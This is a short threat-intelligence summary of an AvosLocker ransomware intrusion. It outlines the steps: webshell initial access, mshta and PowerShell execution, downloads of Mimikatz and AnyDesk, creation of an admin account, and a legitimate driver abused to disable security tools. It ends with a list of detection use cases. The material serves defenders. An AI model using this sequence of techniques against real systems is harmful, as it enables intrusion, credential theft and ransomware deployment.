AvosLocker Infection with Abused Driver
AvosLocker Infection with Abused Driver
Industry: N/A | Level: Tactical | Source: TrendMicro
Trend Micro observed a AvosLocker infection chain deployed within the US abusing a legitimate Windows driver for defense evasion and to disable security defenses. Initial access from the attack leveraged a vulnerability in Zoho ManageEngine Service Desk Plus (telemetry didn't identify the exact CVE used) to upload a webshell. Following command and control activity mshta.exe was leveraged to execute the attacker's HTA file spawning a PowerShell script. Discovery activity for system information was executed along with PowerShell downloads of attacker tools including AnyDeskMSI, Mimikatz, Nmap, PDQ deploy, Netscan, and the creation of an administrator account. A legitimate driver, Aswarpot.sys was utilized to disable security products also from a PowerShell script to stop services. Through the attack, the attackers had attempted to copy a number of their tools including Mimikatz and Impacket, however efforts were blocked. NMap was used by the attacker to identify vulnerable Log4j hosts. Lastly, using the deployment tool PDQ, a batch script was launched to multiple hosts on the victim network.
- Anvilogic Scenario: AvosLocker Infection with Abused Driver
- Anvilogic Use Cases:
- Potential Web Shell
- MSHTA.exe execution
- Common Reconnaissance Commands
- Invoke-WebRequest Command
- MSIExec Install MSI File
- Create/Add Local/Domain User
- Service Stop Commands
- Windows Copy Files
- Driver as Command Parameter
- Mimikatz
- Wscript/Cscript Execution
- Impacket/Empire's WMIExec